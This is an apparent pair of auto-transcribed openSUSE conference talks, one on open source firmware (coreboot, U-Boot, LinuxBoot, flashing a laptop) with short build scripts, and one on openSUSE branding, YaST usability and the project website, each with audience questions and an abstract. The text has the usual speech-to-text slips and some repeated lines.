Back to the supply-chain picture. Above that customer there is this big cloud which is promising us: hey, you can use a lot of free, libre and open source software. You can just download it, you can share it, you can look at it, you can edit it, you can redistribute it, you can do many things with it. But currently that only covers the operating system and the applications. You still need to buy some hardware from a retailer, and you might be a bit unlucky: sometimes you buy something and just find out that this thing doesn't really work for you. Remember when the first problems arose with devices whose UEFI checked for a certain proprietary operating system to be present; you wanted to install another operating system and suddenly people were writing, oh no, nothing works anymore, we have lost our freedom. But that is only where you enter the supply chain. If you look at this picture, I marked in colour everything that is a potential issue. Behind the retailer from which you buy the hardware there is an OEM, or maybe several OEMs; there can be a whole chain of original equipment manufacturers, which again talk to other suppliers. There are the ODMs, the original design manufacturers. There are the IBVs, the independent BIOS vendors; independent meaning that the chain is getting longer and longer. And eventually we have the SoC vendors who actually create the chips. Now we have to assemble everything together and hope it works out. Which brings us to politics. As consumers, of course, the only thing we can do is choose which devices we want to buy. That is literally the only option we currently have. When I look at hackerspaces, usually something like 50 or 60 percent of people are running some old ThinkPads; for some reason it just developed like this. They are very well known for a lot of support, and by support I mean you can run lots of free software on them, even at some lower layers, and that includes even some firmware, but more on that later. Now the problem is that there are still lots of blobs in there. Blobs, or binary large objects, are what we cannot audit: the proprietary stuff we get, where we lack visibility. If we want to gain more freedom here, we need documentation, and we don't get that documentation everywhere; only very, very few vendors actually publish their stuff. Which means you sometimes need a lot of prior understanding to even get started. We don't even have board schematics in many cases, so we have to disassemble our devices and look at the board itself to get an understanding of how things work, or try to come up with conclusions from what we already know. Again, it's a lack of knowledge we start with. And then there are so many chips requiring firmware, and I only mentioned some of them very briefly. It is also other components like video, for example: on some platforms you cannot even have video output without blobs. And that's a bad thing for us as an open source community. We don't really want that; we would like to have the sources, we would like to work on things and improve them. Now, what current vendors do is implement an interface called UEFI. It promises to be extensible, it's a firmware interface, that's literally what the name means, and it is already huge. Now imagine a huge specification that you even want to extend. That's so complex. This is not where we want to start.
And then of course, there is security. I guess everyone has seen those pictures at some point. Spectre and Meltdown, they were in the news. They were big. There were those raw hammer attacks. And this is mostly still in research now. So it's even hard to tell if people actually exploited those vulnerabilities. So once again, that's another reason why we need more open source firmware. And also Bart's schematics and everything else. The Intel management engines had a longer list of CVEs with one, then the second one, and three, and four, and five coming up. People were getting a bit nervous about it. Suddenly calming down again, but still in the first place, it sounded like, oh no, everything is broken now. Well, I can calm you down again as well. It's not as bad at its sounds for end consumers at least. Some server boards were having trouble with this, of course. Because this is where the management engine was actually active. It can be used for provisioning. And that should, of course, work. So x86. Everything which has a minus is a very, very low layer. This is where we have a platform, which we are running on again. And the very first thing here is the ME, the management engine. We rely on something which no one on the outside world has actually seen ever. We could only do some black box tests so we can look from the outside and at some point say, oh, well, there's some service running here and there and we can try fuzzing it. And that's how they found the issues with it. And then we build firmware on top of that. There is now the system management mode. Based on that, we can run hypervisors. And then finally, and this is where we are more familiar with everything. We have our kernel. It can be a Linux kernel. It can be a BSD kernel, of course. Something which is open source, which we know works and we know how it works because we have a lot of knowledge about it. We have sharing of documentation. So that's exactly the opposite of what proprietary vendors are doing. And this is what we want and we want to keep it that way. And of course, that's also true for the applications we run on top. So I guess everyone here knows lots of open source applications. They know how to use them and maybe even saw some of the source code or even delivered patches at some point. By the way, I made this presentation here with Pandoc, although it's the same design as everyone else is using. I made it work also with Pandoc. So they got some patches now. So that's one upside of this talk here. But that's also what we want, right? So being able to contribute, knowing what's going on, auditing things, giving back. And that's why finally we want open source firmware. There is one project called Uboot. You might have heard about it because it's quite famous now. They support multiple different architectures, more than a thousand boards. And you find them on lots of small devices. That includes lots of routers you can get for home use. And also stuff like this. This thing here is so tiny. It's literally just a gigabit ethernet port and a small MIPS CPU behind it. And it's probably booting with Uboot. I'm still investigating this, but this is kind of the devices we're talking about when we talk about Uboot. It's also been used on other platforms, of course. And what does Uboot do? It initializes your hardware. So eventually, including this device and also your home routers, we probably run a Linux kernel on top. 
In this case here it's a build of OpenWrt, the famous open source router project, which is also used for the German Freifunk project, or not just German, I guess by now it has also spread to other countries. And it's so amazing: we can literally build an entire machine now, because we have an overview of all the code running on it, except maybe for some blobs that are still missing. U-Boot can run a Linux kernel directly, but it can also run other stuff, for example a UEFI payload or a legacy BIOS payload. And another project here is coreboot. It's very similar in the regard that it also supports lots of different devices and platforms: it supports x86, some ARM devices, and others. It can also boot a Linux kernel directly, and since we are here at the conference of a Linux-based distribution, I guess you can see where this is going. It's used by Google for the Chromebooks, which are also based on the Linux kernel. It's being applied to more and more servers now, and it's also getting popular among some hackers. I mentioned I'm in a hackerspace, and in fact, in Bochum we have something like ten people now toying around with this. So I just told you we can run a Linux kernel straight from the firmware. What does that mean? You're used to seeing a bootloader, right? Usually when you turn on your laptop you see something like GRUB, or LILO back in the days, or one of the others. And what are they doing there? Reimplementing a lot of stuff which we already have in the Linux kernel: drivers for hard disks, USB and so on, networking for PXE boot maybe, you can even decrypt your hard drives. But why? And that's why we now have the LinuxBoot project. It started last year in January, that's when it was announced. The idea of LinuxBoot is to use a very small Linux kernel, very similar to the OpenWrt approach: just use its drivers for devices, for file systems, maybe for networking and PXE boot again, and then rely on the fact that Linux has been used and developed by so many people that we can be very certain it works properly. And now, suddenly, we can implement bootloaders which really don't have to do much anymore. We really just need to boot an operating system. Imagine you already have drivers, so you can look at file systems and read files, and now you can just kexec into your next Linux kernel. It's amazing. So this is a project which is continuing and growing. It's written in Go, or some of the utilities are actually written in Go, so if you are familiar with that language, it's something you could look into. But since we are running a Linux kernel now, you can write in any language you are familiar with that you can run on an operating system: you can write something in Rust, you can write something in C if you will, anything. So you can help yourself when it comes to booting. And if you are eager now to try this out, I want to tell you a bit about the equipment you need first. We need to take things apart, right? We need screwdrivers. You can get those everywhere, you probably already have them at home; maybe you already exchanged some RAM or added more, or added a hard drive or something, so this is what you already know. In some cases you literally have to open the entire laptop to actually get to where you need to work. And I promise you, a very good investment is a magnifying lens.
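To make the LinuxBoot hand-off described a moment ago a bit more concrete, here is a minimal sketch, not from the talk, of how a small Linux environment can load and jump into the target kernel using the kexec-tools userspace. All paths and the kernel command line are placeholder assumptions.

```python
# Minimal sketch of the LinuxBoot idea: a small Linux userspace loads the
# "real" kernel and jumps into it with kexec. Paths below are placeholders;
# kexec-tools must be available and this needs root.
import subprocess

KERNEL = "/boot/vmlinuz"               # target kernel (placeholder path)
INITRD = "/boot/initrd"                # target initramfs (placeholder path)
CMDLINE = "root=/dev/sda2 ro quiet"    # placeholder kernel command line

def boot_target_kernel():
    # Stage the new kernel image in memory...
    subprocess.run(
        ["kexec", "-l", KERNEL,
         f"--initrd={INITRD}",
         f"--command-line={CMDLINE}"],
        check=True,
    )
    # ...and execute it, replacing the currently running kernel.
    subprocess.run(["kexec", "-e"], check=True)

if __name__ == "__main__":
    boot_target_kernel()
```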
The lens helps because, for some reason, those chips are made in such a way that they are printed dark gray on almost black, so they are very hard to read. If you have a magnifying lens and some extra light and you turn the board a bit, it sometimes really helps a lot to find the right chips in the right place. So this is how you can identify your chips. You see this chip here: it is actually a very small flash chip from which the firmware image is read. On this board we have two of them, and on one of them we have this test clip, which saves you the pain of actually doing soldering work. You can just attach the clip, you only need to figure out the orientation, and that's all; suddenly you can interact with this chip. It's very much like a USB drive, just a bit smaller. Usually those range from 4 to 8 to 16 megabytes these days. This is the 8-pin form factor; there are also 16-pin form factors, but this is what you mostly find on current mainboards, like this one for example. On the other side you need a programmer. You can use anything which knows SPI. This one here is a very, very cheap device; you can get it for five, six or seven euros on Amazon or eBay or whichever is your preferred platform. You can also use a BeagleBone Black or a Raspberry Pi, people are famously doing this a lot, so if you look at tutorials, for example for coreboot, people sometimes use those. I prefer this tiny device for one reason: I don't need to find the SPI interface and I don't get the wires wrong so easily. I only need to get the orientation right, and that's literally it. And again, it's quite cheap. And of course we need the software side. We have open source firmware now, and we need to build it. If you know how to build a Linux kernel, then you also know how to build coreboot or U-Boot; the process is always the same. You need a toolchain: one on your host, but also one for the actual target. Coreboot, for example, lets you build a toolchain with a very small make command for your desired target platform. Of course it takes a while, but then you have a toolchain. Sometimes you need some extra utilities, for example one called iasl, which is used to compile the ACPI code, and then some utility to drive the programmer. There is the flashrom project, which has also been adopted by the coreboot community and knows how to use lots of SPI programmers, including the one I showed, but it also supports others like the Raspberry Pi and BeagleBone Black; you can use many different ones. Now we have everything. Let's start hacking. This is the first very simple thing, which you can do even without the hardware equipment, so everybody can literally do this: you can clone a project, let's say the coreboot project, and build its toolchain. By default it's configured to use SeaBIOS, a legacy BIOS implementation which is open source, as the payload, and you can just run it in QEMU to try it out and see if it boots. So here's just a screenshot of SeaBIOS, which comes up right after coreboot: coreboot takes it as a payload and just runs it, and it gives us some output. It says, hey, I'm SeaBIOS running here, we have output on the screen, and it can try to boot something. You can even attach an ISO file and then boot your favorite operating system. But of course real hardware is more fun. So I want every one of you to look at the devices you find around you.
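Before opening up real hardware, the QEMU experiment just described can be scripted end to end. The following is only a minimal sketch, not from the talk: the clone URL, make targets and programmer name reflect common usage, but the exact configuration steps are assumptions and should be checked against the current coreboot documentation.

```python
# Minimal sketch of the "try it in QEMU first" workflow: fetch coreboot,
# build the cross toolchain, build the default board with the SeaBIOS
# payload, and boot the result in QEMU. The flashrom call shows how a
# backup of a real board's flash would be taken with the cheap CH341A
# programmer mentioned in the talk.
import subprocess

def sh(cmd, cwd=None):
    print("+", " ".join(cmd))
    subprocess.run(cmd, cwd=cwd, check=True)

def build_and_boot_in_qemu():
    sh(["git", "clone", "https://review.coreboot.org/coreboot.git"])
    sh(["make", "crossgcc-i386", "CPUS=4"], cwd="coreboot")  # build the toolchain (takes a while)
    sh(["make", "olddefconfig"], cwd="coreboot")             # accept the defaults (assumed: QEMU board, SeaBIOS payload)
    sh(["make", "-j4"], cwd="coreboot")                      # produces build/coreboot.rom
    sh(["qemu-system-x86_64", "-bios", "coreboot/build/coreboot.rom", "-serial", "stdio"])

def backup_real_flash():
    # Read the current firmware image from a real chip via the external programmer.
    sh(["flashrom", "-p", "ch341a_spi", "-r", "backup.rom"])

if __name__ == "__main__":
    build_and_boot_in_qemu()
```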
Disassemble them. Look into them. We need that information which is still proprietary now. We can get lots of clues by just opening up devices. We can read out from work. We can analyze it. We can look at the board schematics from, well, the actual hardware standpoint if we don't have them in datasheets. We can try to figure things out. And that's what I did. This year is the result of, let's say, some years of work. I had this laptop for quite a while. It's from XMG which are related to Tuxedo. They are also present here. And I was having a slight problem with the touchpad here. So this thing here is a gigabyte laptop, so it's not clevo branded as most of the other devices they sell. And gigabyte doesn't publish much information. I tried to apply one of their firmware updates. I got it to boot. After having all of this knowledge, I literally used the programmer to flesh that new firmware. But I wasn't still very happy with it. So a friend of mine said, hey, let's see. Maybe you can get along with Coreboot. And I promise you it was very, very refreshing, painful, and at the same time, happy tour through all the layers of hardware and firmware. I gained so much knowledge just during the last, let's say, three months while doing this. All my progress is behind those links here. So I put everything on GitHub. There is one gist where I dropped lines on all the steps I went through. Some patches are already in the Coreboot documentation now. And there will be more and more added. And at some point, you will see that it's actually so similar to the Linux kernel. In lots of ways, we can learn from each other. And in fact, for this very device here, I looked at the Linux kernel source code to find relationships between certain chips I have in this laptop. For some reason, I was lucky to figure out about one chip that it's actually the same model as a different one when a company name changed. But how do you figure this out? Even if you know names of certain chips, you use a search engine to get information. It's really not trivial. But we can share information. And I'm very happy that the Linux kernel is open source. I could get that. So what did I get to work? You can see text on the screen here. It's not in a high resolution. So that's still something coming up. But, you know, I already got this output. Of course, before that even, RAM works. If you know operating systems, you already know that RAM is there. But this is what the firmware needs to initialize first. That's the first step you need to go through until you can actually do something more meaningful. They can initialize all the other hardware. But if you don't have RAM, then, you know, nothing actually works. Okay. So the laptop booted. I could also boot in my operating system. I could get the high resolution because the Linux kernel had the correct drivers and everything. And in fact, even without the video blob, I could actually boot. I just couldn't see the print where I would have to enter my password here to unlock. But yeah, I figured that out later then. Bluetooth works, Wi-Fi works, USB works, even suspend and resume, which I didn't expect in the first place worked. It didn't work with the lid being closed. So there is ACPI events which need to be triggered. But yeah, that's the next steps now. And one thing which is even more painful, I already mentioned this earlier, the embedded controller, which is responsible for cooling down the system. It didn't really do its job. 
I haven't yet figured out the issue, but we're getting there. Now here's another call for action. I know we have very, very, very smart people here who can help. We have Tuxedo here. I talked to them. There is other vendors, of course, but please talk to them. Talk to the device manufacturers or the retailers or OEMs, whatever, where you get your laptop from. Talk to them. Ask them about open source firmware. That's the first step to signal that we have a lot of interest in that. Operating system distributions. Why not integrate firmware updates as well? We just had a talk, a very short one, but a very good one, about transactions. When you hear, hey, we don't really want you to install firmware updates actually because it might break your device. That doesn't make us very happy. Coreboot supports having multiple payloads and multiple implementations of the initialization as well. So we can also failover. That's what the Chromebooks are, for example, doing, by the way. We can build our own firmware. We have OBS, we can even run checks on the firmware. We can use OpenQA for that. We have a lot of infrastructure. And of course, we can bring the kernel and firmware developers a bit closer together. So if you're working on the Linux kernel, look into projects like Uboot, look at Coreboot, see if there is something you can do for them, see if there is something they can do for you, so that you don't need to fix broken ACPI tables or something. You can join the community. We have different channels and different chat systems, IRC, there is Slack for the more modern people, and of course, now, let's celebrate, actually. Uboot and Coreboot are both turning 20 this year. This work has been going on for a long time. We have a lot of people who are using the Linux kernel. Let's celebrate, actually. Uboot and Coreboot are both turning 20 this year. This work has been going on for 20 years. It's not as old as the Linux kernel. And in fact, the Coreboot project itself was first called Linux BIOS, because that's what they were going for. Now it's more universal. We can celebrate 20 years of open source firmware, but there is still so much work to be done. So let me invite you to join us in the open source firmware conference. The next edition will be this year, again in September. This time, we will be in San Francisco. So we're going around the globe a bit. If you are interested, the call for papers is still open. If there is something you can tell, maybe from the perspective of an operating system, from a distribution, or from a kernel, please do so. We had lots of interesting talks already last year, and what I'm still missing is more synergies, because I feel that there is still something we can share. And with that, thanks again for everything, for listening to me here in the afternoon and hot summer. And if you have any questions, please ask me everything. The mic is already there. So you said that you were interested in building bootloader packages, so we already have a hardware colon boot project in OBS that could be used for that, or you could have, you know, a subproject as a new... Can you get the mic a bit closer? Sorry. There is a hardware colon boot project in OBS. If there's any additional bootloaders that you need beyond UBoot that we already have there, for instance, you're free to submit stuff there, or we can also create, you know, subprojects as needed for that. Okay, great. Thanks. My question relates to the management engine Intel. 
There are a couple of myths running around it, and what would happen if I just switch it off? We'll try. That's the point. How? So what you can do literally is, if you have the ME region in that flash chip I showed you, you can just override it with zeros. I promise you your system won't boot. That's what is going to happen. There is one project which is called ME Cleaner to strip down the ME to the essential part you actually need. I mean, if you don't have the ME running, then sadly your device won't really work. That's the sad news. The good news is that we can at least remove some stuff which is really not necessary, but potentially harmful. The project is also still going on. It's a Python script, so you can look into that. We're going to talk about it in Tuxedo twice. Can we assume from that that the current devices that they're selling with OpenSUSE are pre-installed have a proprietary firmware still? This one here is actually also a Tuxedo laptop, and it is running a proprietary firmware. In my case, it's from American Mega Trends, or AMI for short, and I even ran an upgrade to that. Currently, they do ship proprietary firmware. They do offer updates. You have to sign up on their platform and ask for them, and you can at least get updates. But of course, I would also love to see OpenSUSE firmware on it. I actually do talk to them a lot. We have one guy who already ported his laptop to Carboot, which is also a Tuxedo one, a quite modern one. I'm looking forward to parting this year next. Once my other laptop is working properly again, we can swap roads and take care of this one. We have two minutes. I still have a little bonus. I already talked to you being maybe kernel developers or maybe distro developers. There is an event coming up, the ITSA, or ITSA. ITSA is also here in Nuremberg, so that's later in the year. You can use this opportunity to come and visit a friend of mine who is running the company Nine Elements Cyber Security. They port Carboot onto more and more devices, and they develop security features for the firmware. If you are running data centers, this might be an option for you as a business user. Any more questions now? Thank you.
Firmware is found in all computing devices, including PCs, laptops, networking equipment, printers, embedded devices such as IoT and industrial controllers, mobile phones, tablets, and more. The community around open source firmware has grown over the last years, allowing for more exchange in the development and granting freedom to end users. Prominent projects like U-Boot, Tianocore, coreboot and others teach how firmware works and welcome contributions. This talk provides a brief introduction into firmware, an overview of the general build process, a perception of the current state of development on two platforms, an end user report, and a summary of the first Open Source Firmware Conference, which was supported by the openSUSE project.
10.5446/54415 (DOI)
Hello, I'm LCP, or Tashik, as you can see. I will be talking about the artwork, branding, UI and UX of openSUSE over the last two years, basically. I should start by inviting you to join the team, because we are missing a lot of people. It would be great if the team were larger, and I would be glad to see some people joining, because we are doing great things. And speaking of doing great things, it's important to remember that we don't really take feedback through Twitter; getting some feedback through Twitter is nice, but there are better channels to request features. And, I mean, we also do memes when we have some free time. So I welcome you to join us. From the stuff we have done, and this is a very short list, we did the YaST icons, which you might have seen in Leap and in Tumbleweed, and we have done the branding for the distributions over the last two years. There is so much more that we have done, but I feel the contributions that really matter are the ones that are not visible to everybody, because you get to appreciate them without really knowing who made them. It was the team, which was us. And from my maybe slightly more personal point of view, we have some things to discuss. Those things are the logos, the colors, the things that people associate with openSUSE, and things that maybe aren't exactly what they should be. Maybe we should try to make them a little more accessible, a little more interesting, a little more different from, for example, the SUSE logo, which is exactly the same as the openSUSE logo except for the cut-off feet. Currently we share the same logo, and that's probably not the best idea, because our branding ends up very similar to what the SUSE folks are doing. It doesn't help us have our own identity, it doesn't help our own marketing, and it keeps us from being seen as separate; we call ourselves separate entities, and even though we are closely related, we are trying to be distinct from SUSE. And then there is the issue of Wikipedia having the wrong logo, with the eye filled in with white, which looks terrible on any background other than white. And I can't change that, because I don't have access and nobody has access: the person who changed it stopped contributing to Wikipedia, so it seems nobody can fix it. So maybe we should change the logo for that reason too. All right. There is also the topic of the distribution logos. Here Tumbleweed is probably the biggest issue, because its logo is so wide that it's really hard to make it work next to Leap. The logos don't look like they belong together, which is a problem when you present them next to each other; they appear to be in different styles, and that might be something that needs to be iterated on, maybe changed in the future. And then there are the colors. You know our colors, they are visible on the slide: dark blue, green, and a hint of cyan at the bottom. At least one distribution logo uses green for its color, which makes it look like the default distribution next to the openSUSE logo, and that is an issue when you are trying to present Tumbleweed and Leap as things that are equal to one another.
Maybe that also requires some thoughts from us and there is a very limited palette. So there is basically, I added red and yellow last year, I think, and it's still barely enough to actually create artwork that would be in line with what we want out of OpenSousa as in brand and from what we actually can do because there is a limit to the colors and stuff. This far there were few ideas that appeared in different places. They are very simplistic and would probably help to show the way, would allow to easier show the brand compared to current ways. It's an interesting idea. I don't know if anybody likes it. So that will maybe require some discussion. Obviously, you can also see that Leap here is yellow instead of green, which I think is a great color. Yellow is great. And certainly it's in green, which makes it look less default than it currently appears to be. And that logo was a happy accident. That second one was a happy accident of going through various stages of previous logo and then creating stuff that just kind of worked. There are obviously on the left there is depressed and very happy Giko. And there is also a Giko. There are a lot of weird ideas that came from that. And there were some ideas for variants because current logo has very strict guidelines as to what colors can be used with it. And I feel like maybe we could create some more interesting stuff. Out of this, there is obviously Fedora logo Giko and Thread Hat logo Giko just because I could. There are different variants there. I don't know if there are grades. There are things. And I think it's a better idea than having Giko always be green because communities want to express themselves in a way which would show better who they are. So there are, for example, community logos, proposals for different countries on the bottom there for Poland, Ukraine, and Italy for some reason. I don't know. So feedback about that. There is an open issue on branding repo. And I would really love more feedback about all those things because I mean, it will, if that goes through, it will represent the whole community. And I would love to hear what you think. I can't do this alone. I just can't. So there are more issues related to presenting the brand from desktop side of things because we have wallpapers. We have some splash screens for different software. And it appears before the presentation as XFC was loading. There are those simple things that maybe are ignored but are very important from my point of view, from where I'm standing. And maybe currently we are thinking to modern. We are a little bit too far in advance to what OPS truly is. We have green and we have very specifically chameleon as the logo. Maybe we could do something more natural, maybe something more, I don't know, something that isn't as modern as what we currently do with architecture and with light bulbs and stuff like that. Maybe there is a place where more natural things would work better with the things we currently have, which is green, blue and stuff like that. There is also an issue of merchandise. And it's a topic, certainly. We tend to focus heavily on logos, which is fine when you are trying to maybe spread awareness of the logo. But I think that maybe we should try to be a little more creative, try to be a little more interesting with how we present the brand outside of conferences, outside of websites, et cetera. We want people to go up to other people and ask, wow, what a nice t-shirt, where did you get it? 
And you can explain all the things you like about openSUSE, et cetera, if you have some desire; if you don't, then you just don't tell them anything and say that it's a great t-shirt and you like it. All right, now maybe the UX part of things. There is obviously a list here; it's not a complete list, but it's certainly about YaST. And if you ask the YaST folks about this, it's very clear that they would like to change these things, but it's not as if they can simply go and change them. So maybe we shouldn't start from there; maybe we should start from actually creating mockups of the things that should happen in YaST, and then, when we have some idea of what exactly we need, we should start writing all that stuff in libyui, libyui, I can't even say it, and then in the YaST core, et cetera. All this stuff needs to go through stages to actually be developed into something that can happen in the future. So if you are interested: currently we don't have any place to really put that stuff, but I was thinking about a Trello board and creating some issues about specific parts of YaST. We have some mockups for the installer, but we certainly don't have mockups for the seventy or so other modules that exist in YaST, and I doubt we will be finished with that by, I don't know, next year, because it's actually a lot of stuff to do. So if you are interested, let us know. We are on Discord, Matrix, IRC, the openSUSE artwork channels, everywhere, just let us know. And then there is the landing page. And oh boy, what a joy. I mean, I like the design, it's great, but I don't think the content is necessarily what we should have there, because we are looking at a very distribution-focused design, while openSUSE, more than being a distribution, is a community of people. So if we are a community, it would be nice to actually mention somewhere on the page that we are a community. Maybe, instead of having all this, we should use software.opensuse.org to actually show that we have distributions, and on the main page just mention that, hey, you can download them here, and redirect to that page. Maybe that's a better idea. There is a lot of duplication of the things we are trying to sell between the two sites, and the navigation structure on the main page is terrible, because it only links to the stuff that is on the page itself. I can scroll; I don't really need navigation for things that already show up on the page. I would like to see links that actually take me to something that isn't on the page, something related to how openSUSE operates and how it works, not necessarily what is directly within the page. Then we have the list of tools, which, well, is not a long list, that's for sure. I'm certain that we actually do more than four things, and maybe the wiki isn't the best place to put them all. There is certainly not enough space on the screen for everything either, but I think having a few categories for the things we do is great; let's just mention everything we actually do, because that stuff is useful and we are proud of it as a community. Maybe we could have all of those mentioned on the main page. Then, oh yeah, I mentioned all that already. And news: news are great. I would say news certainly deserve to be on the main page, and I am glad they are already there. So from this, we do have stuff that we know will be on the page.
But what is missing is certainly focus on the community, focus on the ways to contribute, focus on developed projects. All of that is really, really missing from the main page. And then there is software, which, well, it's missing a lot of stuff about distributions as well, even though it is focused about distributions, around distributions. All that stuff is basically on the Wikis and it's hard to find, and it's kind of maybe not that well executed in many cases. Maybe we should try to strive for better explanation of our own distributions. Maybe we should sell them better. Maybe we have something that differentiates us from different distributions. I don't know. It's not written there. So yeah, that's basically it. I don't have anything else prepared. I have a nice screen and that's it. Thank you. So now is the part where you ask me questions. I don't know if I will have answers, but I will try to answer you. If you have any questions. So if you want to change the logo to have more of a clear separate identity from SUSE, what about the name? So historically speaking, the logo itself is based on an old SUSE logo. They changed the SUSE logo and they didn't update the open SUSE logo, which created disparity between the two and it only makes things worse, in my opinion. It's not really, I mean, the change of the logo was basically only cutting off legs and that's it. Yeah, mainly. You're right. Mainly, but not exactly. That's not exactly the truth, but it's close. It's close enough from a normal user's perspective. That's what they say. But the fact of the matter is, is that when that happened, that just weakened both brands, in my opinion. Yes, of course. The idea of creating a different logo, in fact, I really like that work that you did. I saw that. It's been around for a while and it's been really good. I agree with this young man saying that if you want separation, then go separation. So as long as we try to keep them close, similar, but different, there's going to be a lot of constraints on that and it's going to be really hard to push through. And then Susie has a vested interest in it as well then. If you change it, that goes away. I hope so. I mean, I'm bound to the last part of the, if paradise is, I'm bound to that. I'm not talking about that because I know that's way more controversial than the logo itself. So I will ignore it. How long did it become a version? So let's go back to Yast. Because you mentioned the partitioner, for instance. And that's one thing. So here's the interesting part of Yast is that it's the one place where Susie and Open Susie are directly connected because Susie certainly has a very long list of features of required functionality, la, la, la, la, from product management that is really historically grown and probably not that transparent. So not everybody knows exactly why every feature is in Yast that's there. The partitioner is something that we haven't touched because of the complexity and because of that, those kind of issues so far. I was told that the reason why partition looks like it does is because nobody cares to change it. It's too complex to change. It was based on some stuff many, many, many years ago. And building on top of this old thing is just making it worse. The fact of the matter is that you have Yast and the partitioner is a separate thing. So the partitioner itself in code is a separate thing. And it uses a different QT. It's all... No, no, no, no. That's Packager which does that. 
Partitioner itself is a module that is directly bound to Core Yast. And Packager is a separate module that is built on top of QT. The package selection stuff too. So I mean, partitioner shouldn't be as hard to change. Package management I won't talk about because I know it's for Yast for controversial topics. It's a big country. I already discussed it. Realistically speaking though, the package manager would be an easier thing to change from understanding users' needs than the partitioner would be. Yes, yes, of course. I mean, the first thing that partitioner certainly needs is a menu bar because it's a lot of Yast modules need that. It's a feature that needs to be somewhere in the code. It is in the code, but only for QT and only for wizard dialogs which is installer and one QT install which wouldn't make sense for partitioner. So I'm not trying, I'm sorry. The last point on the Yast thing was, go back to the screen. I forgot now what I was going to say. Ah, the idea of creating mockups. So Yast in and of itself, the way it works, being built on an old QT with, you can't just do whatever you want. Yes, I know. That's why I said that all the stuff would need to first go through LIBWI UI and then go to the Yast bindings and then go to other things. It's a complicated process, but creating stuff that is reusable and that will be able to reuse in multiple places will make it much better. Which is why mockups make sense because we can then just look what we can simplify in multiple modules and have it all make sense, maybe. Again, assuming that you have a full and clear picture of all of this, any of this, is a full and clear picture of requirements. Yes, and that will be hard. So I just want to ask, would you say this is a big dream of yours? It's good that you've done a lot of explorations with the logo. Is it more like something you're doing on the side or is it something you really want to action and push within the company? I mean, it was in discussions with the board, certainly. It's not like I'm hiding that. It publicly shows up in multiple places. And I doubt anybody haven't seen that. Obviously, somebody here won't have seen that, but I hope that this spreads and gets maybe popular so I can get it easier into the distribution. What would you say your number one blocker is? What is stopping you from getting to the next level? That's a good question. I have no idea, to be honest, because I think the biggest blogger is myself. Because I keep changing stuff and I keep adding stuff. And at some point when I stop doing that, I will have clear picture that I want this and that. And I doubt it will happen soon. Okay. Do you have a chief of marketing officer? Huh? Do you have a chief of marketing officer that you could collaborate with? I mean, not so much on the visuals, but more on the idea. I mean, I don't really have a direct contact with anybody like that, but that would be an interesting collaboration. Sure. Okay. But I doubt from your presentation it sounds like you're the guy to drive this. I hope so. Yeah. I mean, I haven't seen anybody else that would be crazy enough to change that. Yeah. Thank you. So about the landing page, I asked with Kristian and Broen, they said that the landing page is now not controlled by open-susa communities, controlled by Suzer. So we cannot kind of change it. That's actually from... First off, I'm the head of the UI UX team at Suzer, just for transparency. It is not controlled by us. I promise you we don't want to control it. 
The fact of the matter is that whenever things are needed, we end up having to do them, because no one else will. And logistically speaking, it's sitting in a data center, in a server room, where SUSE and openSUSE don't really have that much access. So control is hard. It might be interesting to understand the history of that page. Historically it became what it became back a long time ago. We came along and there was a request to change things. With, let's say, limited information, which is always the case at SUSE or openSUSE, we tried to create a more marketing-like page to sell openSUSE on the internet. That was the concept of it. Requirements change, and there are many ideas of what could be on that page and many ideas of how to present it; many are assumptions. Software is software and the marketing page is the marketing page: software is where you go to find your packages, the marketing page is the marketing page. You can change that, you can do it differently; there's no law that says otherwise, we don't define it as such. But again, understanding requirements is the first step. And to understand that, really ask the whole community, get a good idea, and have someone with a marketing concept put all this information together first, before you start changing things. That's my suggestion. And don't ever write code that you don't want to maintain yourself; that's what I've learned.

I create mock-ups first.

And one more thing, about the fonts. Now we have Open Sans on almost every page. I think it's a good font, but people are just getting bored by this font; every web page uses the same font. If we want users to remember us, maybe we could introduce more fonts.

If anybody wants to create a font, I'm not the guy; I certainly can't. I mean, not create fonts, but maybe choose a more distinctive font. I'm not bored yet, maybe. But if anybody has better ideas, I'm very happy to oblige.

Once you have a good idea of what you want your logo to look like, it is then much easier to come up with a special font that sits alongside it, matches that logo well, and can be used in special places.

And then after you, Andrew. So after, yeah, sorry. The one thing that you have to take into consideration with fonts is glyph and language coverage. It is really, really hard to make a font; it's literally something that you can do your whole life and only then get good at, and you can spend many, many years with many, many people making fonts. So creating our own font is probably a bit beyond scope, I would assume. People have tried and failed. Picking the best font for the most people is, I think, what the decisions were based on until now.
So I like the fact that it's still a chameleon for me. As long as it's a chameleon, there's an obvious association. And chameleons are wonderful creatures that can be many weird different colors. So I think as long as it's recognizable of some form of the same kind of animal, we have that cross-representation still. And for me, that's kind of enough. Let's make it pink then. Red used to be my favorite color. So very honestly, this idea of open SUSE being close, branding-wise, but yet separate was a big mistake, if you ask me. So historically speaking, that was a mistake, tacking and open on to everything because we're trying to sell our open sourceness was historically a bad decision and should be changed, but you need, again, a strategy and understanding. I didn't say that. I said that. I said that. Yeah. Just to kind of follow what I was thinking, I know you skipped over the name thing, but with the logo idea, with also something the board is going to be talking about at one o'clock in the main hall for the big board meeting today, I do think maybe that needs to come up with it. What I like with your ideas is if we keep it to the chameleon, like with Fodor, there's room for visual similarities, but colors, naming. I'd like us to have everything on the table as we talk about this stuff. All right. That's your call. Yeah. I am not saying anything because I did suggest some, whoops, whoops, I did suggest some names, but they weren't great, to be honest. Yeah. I know this will end up being a massive discussion in the last February, but at least it's my fault now. Thank you. Yeah. Thank you. Thank you. Thank you. Thank you. Thank you. Thank you. Thank you. Thank you. Thank you. Thank you. Thank you. Thank you. Thank you. Thank you.
openSUSE's brand image and software have been evolving for a long time, and in that time a lot of stuff was defined. There is YaST, there is geeko, both are industry standard, both function as a way to differentiate the distribution. However not everything that is openSUSE is great, in many cases, there are some serious omissions in terms of how openSUSE is sold through the eyes of potential users. This talk would function as a way to highlight some of the issues that will require further development in upcoming years, to support future devices, use cases for the distribution, ease of use, as well what we should improve in terms of presentation of the brand itself.
10.5446/54416 (DOI)
